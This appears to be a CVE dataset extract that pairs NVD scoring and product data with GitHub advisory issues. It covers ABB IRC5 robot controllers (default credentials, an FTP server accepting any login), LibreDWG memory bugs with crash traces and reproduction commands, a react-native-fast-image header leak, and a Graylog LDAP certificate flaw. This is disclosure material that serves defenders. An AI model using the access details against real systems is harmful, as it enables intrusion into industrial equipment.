"HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3326" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3326" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:abb:irb140_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "2D490DBD-AF3C-46EF-8CA0-6C113C7FF3A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:abb:irb140:-:*:*:*:*:*:*:*", "matchCriteriaId": "4A6784E9-6C10-4DC4-8CDB-091EFF88BD2F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:abb:irc5_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "23C8161D-E950-45DC-B8D8-D34B161B4C5C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:abb:irc5:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB3C36DB-C7BB-4EB2-AE54-CE72067D1592", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "522" ]
522
https://github.com/aliasrobotics/RVD/issues/3326
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 3326 title: 'RVD#3326: Hardcoded default credentials on IRC 5 OPC Server' type: exposure description: The IRC5 family with UAS service enabled comes by default with credentials that can be found on publicly available manuals. ABB considers this a well documented functionality that helps customer set up however, out of our research, we found multiple production systems running these exact default credentials and consider thereby this an exposure that should be mitigated. Moreover, future deployments should consider that these defaults should be forbidden (user should be forced to change them). cwe: CWE-255 cve: CVE-2020-10287 keywords: - IRC5, FTP, Credentials system: IRB140, IRC5, vendor: ABB severity: rvss-score: 10.0 rvss-vector: RVSS:1.0/AV:RN/AC:L/PR:N/UI:N/Y:M/S:U/C:H/I:N/A:H/H:U/ severity-description: Critical cvss-score: 9.1 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H links: - https://nvd.nist.gov/vuln/detail/CVE-2010-2966 - https://github.com/aliasrobotics/RVD/issues/3326 flaw: phase: testing specificity: general-issue architectural-location: Platform code application: OPC Server subsystem: UI:Login package: N/A languages: None date-detected: 2020-05-18 detected-by: Alfonso Glera, Victor Mayoral Vilches (Alias Robotics) detected-by-method: testing dynamic, Browser. date-reported: '2020-07-15' reported-by: Victor Mayoral Vilches reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/3326 reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#3326: Hardcoded default credentials on IRC 5 OPC Server
https://api.github.com/repos/aliasrobotics/RVD/issues/3326/comments
0
2020-07-15T21:59:00Z
2020-07-15T22:05:07Z
https://github.com/aliasrobotics/RVD/issues/3326
657,686,393
3,326
1,342
CVE-2020-10288
2020-07-15T23:15:11.393
IRC5 exposes an ftp server (port 21). Upon attempting to gain access you are challenged with a request of username and password, however you can input whatever you like. As long as the field isn't empty it will be accepted.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3327" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3327" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:abb:robotware:5.09:*:*:*:*:*:*:*", "matchCriteriaId": "C9C363AC-475E-42E1-937B-D34A45AE9E32", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:abb:irb140:-:*:*:*:*:*:*:*", "matchCriteriaId": "4A6784E9-6C10-4DC4-8CDB-091EFF88BD2F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:abb:irc5:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB3C36DB-C7BB-4EB2-AE54-CE72067D1592", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:windriver:vxworks:5.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "2490A606-8525-4D45-B0A5-975E125257A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "287" ]
287
https://github.com/aliasrobotics/RVD/issues/3327
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 3327 title: 'RVD#3327: No authentication required for accesing ABB IRC5 FTP server' type: vulnerability description: IRC5 exposes an ftp server (port 21). Upon attempting to gain access you are challenged with a request of username and password, however you can input whatever you like. As long as the field isn't empty it will be accepted. cwe: CWE-284 cve: CVE-2020-10288 keywords: - IRC5, FTP, Autentication system: IRB140, IRC5, Robotware_5.09, VxWorks5.5.1 vendor: ABB severity: rvss-score: 9.4 rvss-vector: RVSS:1.0/AV:IN/AC:H/PR:L/UI:N/Y:Z/S:U/C:H/I:H/A:H/H:H severity-description: Critical cvss-score: 9.8 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H links: - https://cwe.mitre.org/data/definitions/284.html - https://github.com/aliasrobotics/RVD/issues/3327 flaw: phase: testing specificity: general-issue architectural-location: Plataform code application: FTP server subsystem: UI:Login package: N/A languages: None date-detected: 2020-05-11 detected-by: Alfonso Glera, Victor Mayoral Vilches (Alias Robotics) detected-by-method: testing dynamic, Nmap. date-reported: '2020-07-15' reported-by: Victor Mayoral Vilches reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/3327 reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#3327: No authentication required for accesing ABB IRC5 FTP server
https://api.github.com/repos/aliasrobotics/RVD/issues/3327/comments
0
2020-07-15T22:03:16Z
2020-07-15T22:05:07Z
https://github.com/aliasrobotics/RVD/issues/3327
657,688,647
3,327
1,343
CVE-2019-20909
2020-07-16T18:15:12.690
An issue was discovered in GNU LibreDWG through 0.9.3. There is a NULL pointer dereference in the function dwg_encode_LWPOLYLINE in dwg.spec.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/commit/d7913b893bfa98fab27f05825dc4cab2d3a20c83" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/178" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/commit/d7913b893bfa98fab27f05825dc4cab2d3a20c83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/178" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "28E3A7DE-65A0-4A6B-BF63-00F627CF17CB", "versionEndExcluding": null, "versionEndIncluding": "0.9.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreDWG/libredwg/issues/178
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, I got some bugs, and I tested on master branch and version **0.9.3**. There are **3 heap overflow**, **2 NULL pointer deference**, **1 denial of service**, **1 stack overflow** (this bug causes memory leak in master branch) in that. Compile with **ASAN** and use **dwgrewrite** to repro that. Hear are some details:
Several bugs need to be fixed.
https://api.github.com/repos/LibreDWG/libredwg/issues/178/comments
19
2019-12-31T06:04:23Z
2025-01-06T10:24:48Z
https://github.com/LibreDWG/libredwg/issues/178
544,098,538
178
1,344
CVE-2020-7696
2020-07-17T10:15:12.467
This affects all versions of package react-native-fast-image. When an image with source={{uri: "...", headers: { host: "somehost.com", authorization: "..." }} is loaded, all other subsequent images will use the same headers, this can lead to signing credentials or other session tokens being leaked to other servers.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/DylanVann/react-native-fast-image/issues/690" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/DylanVann/react-native-fast-image/pull/691" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-REACTNATIVEFASTIMAGE-572228" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/DylanVann/react-native-fast-image/issues/690" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/DylanVann/react-native-fast-image/pull/691" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-REACTNATIVEFASTIMAGE-572228" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:react-native-fast-image_project:react-native-fast-image:*:*:*:*:*:*:*:*", "matchCriteriaId": "08F2A94F-6529-4117-B798-A6B5741CC615", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/DylanVann/react-native-fast-image/issues/690
[ "Exploit", "Third Party Advisory" ]
github.com
[ "DylanVann", "react-native-fast-image" ]
**Describe the bug** When an image with `source={{uri: "...", headers: { host: "somehost.com", authorization: "..." }}` is loaded, all other subsequent images will use the same headers. This can lead to images not showing, because the `host` header is wrong, and web servers will return 404 errors for the request. **To Reproduce** Steps to reproduce the behavior if possible, or a link to a reproduction repo: 1. Go to https://hookbin.com/ and create a new endpoint 2. Add an image with `source={{ uri: "hookbin endpoint #1", headers: { foo: "bar" } }}`. 3. Create another endpoint at hookbin 4. Add another image with `source={{ uri: "hookbin endpoint #2" }}`, ensure it loads after image 2. The request for image on endpoint `#2` will include the `foo`: `bar` headers. This is probably the reason of a lot of errors with images not properly showing in this repository. **Additionally, this is a serious security issue, as signing credentials or other session tokens could be leaked to other servers. See screenshot below.** **Expected behavior** Headers should not be reused. **Screenshots** <img width="428" alt="image" src="https://user-images.githubusercontent.com/697707/83863179-aa406280-a72b-11ea-8fc6-c1c44218c3ac.png"> Notice how headers are leaked to other servers. The headers were only supposed to be used for images from the s3 bucket, but they are attached to every request. **Dependency versions** - React Native version: 0.62.1 - React version: 16.11.0 - React Native Fast Image version: 8.1.5
[iOS] Headers for one request are sent for all subsequent requests, even if no headers specified
https://api.github.com/repos/DylanVann/react-native-fast-image/issues/690/comments
4
2020-06-05T09:52:30Z
2020-07-17T08:39:07Z
https://github.com/DylanVann/react-native-fast-image/issues/690
631,464,734
690
1,345
CVE-2020-15807
2020-07-17T16:15:11.560
GNU LibreDWG before 0.11 allows NULL pointer dereferences via crafted input files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "581DFE64-B504-4D86-AAAA-33836C432C53", "versionEndExcluding": "0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreDWG/libredwg/issues/186
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I got a NULL pointer deference bug in **0.10.1.2677 and even earlier** by run `dxf2dwg poc -o /dev/null` ``` ==12391==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f9f9b4f3284 bp 0x7ffcfa3b08a0 sp 0x7ffcfa3b0860 T0) ==12391==The signal is caused by a READ memory access. ==12391==Hint: address points to the zero page. #0 0x7f9f9b4f3283 in add_MLINESTYLE_lines /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:1462 #1 0x7f9f9b554a23 in new_object /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:5897 #2 0x7f9f9b564d2d in dxf_objects_read /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:7245 #3 0x7f9f9b56bb16 in dwg_read_dxf /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:7701 #4 0x7f9f9a684ee7 in dxf_read_file /home/skyvast/Documents/libredwg-0.10.1.2677/src/dwg.c:319 #5 0x564a81d20465 in main /home/skyvast/Documents/libredwg-0.10.1.2677/programs/dxf2dwg.c:255 #6 0x7f9f99d8fb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x564a81d1f489 in _start (/home/skyvast/Documents/asan_libredwg/bin/dxf2dwg+0x2489) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:1462 in add_MLINESTYLE_lines ==12391==ABORTING ```
NULL pointer deference
https://api.github.com/repos/LibreDWG/libredwg/issues/186/comments
3
2020-01-14T12:30:37Z
2020-07-20T02:14:44Z
https://github.com/LibreDWG/libredwg/issues/186
549,536,132
186
1,346
CVE-2020-15807
2020-07-17T16:15:11.560
GNU LibreDWG before 0.11 allows NULL pointer dereferences via crafted input files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "581DFE64-B504-4D86-AAAA-33836C432C53", "versionEndExcluding": "0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreDWG/libredwg/issues/189
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, I got some bugs which you can reproduce `dxf2dwg $PoC -o /dev/null` .Thses bugs work on version `0.10.1.2685` and `earlier`.
Some NULL pointer bugs
https://api.github.com/repos/LibreDWG/libredwg/issues/189/comments
58
2020-01-16T11:36:57Z
2020-07-20T02:15:32Z
https://github.com/LibreDWG/libredwg/issues/189
550,751,408
189
1,347
CVE-2020-15807
2020-07-17T16:15:11.560
GNU LibreDWG before 0.11 allows NULL pointer dereferences via crafted input files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "581DFE64-B504-4D86-AAAA-33836C432C53", "versionEndExcluding": "0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreDWG/libredwg/issues/190
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, I got some bugs which you can reproduce `dxf2dwg $PoC -o /dev/null` .Thses bugs work on version `0.10.1.2685` and `earlier`.
Some heap_overflow bug
https://api.github.com/repos/LibreDWG/libredwg/issues/190/comments
5
2020-01-16T11:51:56Z
2020-07-20T02:16:17Z
https://github.com/LibreDWG/libredwg/issues/190
550,758,758
190
1,348
CVE-2020-15813
2020-07-17T19:15:12.547
Graylog before 3.3.3 lacks SSL Certificate Validation for LDAP servers. It allows use of an external user/group database stored in LDAP. The connection configuration allows the usage of unencrypted, SSL- or TLS-secured connections. Unfortunately, the Graylog client code (in all versions that support LDAP) does not implement proper certificate validation (regardless of whether the "Allow self-signed certificates" option is used). Therefore, any attacker with the ability to intercept network traffic between a Graylog server and an LDAP server is able to redirect traffic to a different LDAP server (unnoticed by the Graylog server due to the lack of certificate validation), effectively bypassing Graylog's authentication mechanism.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
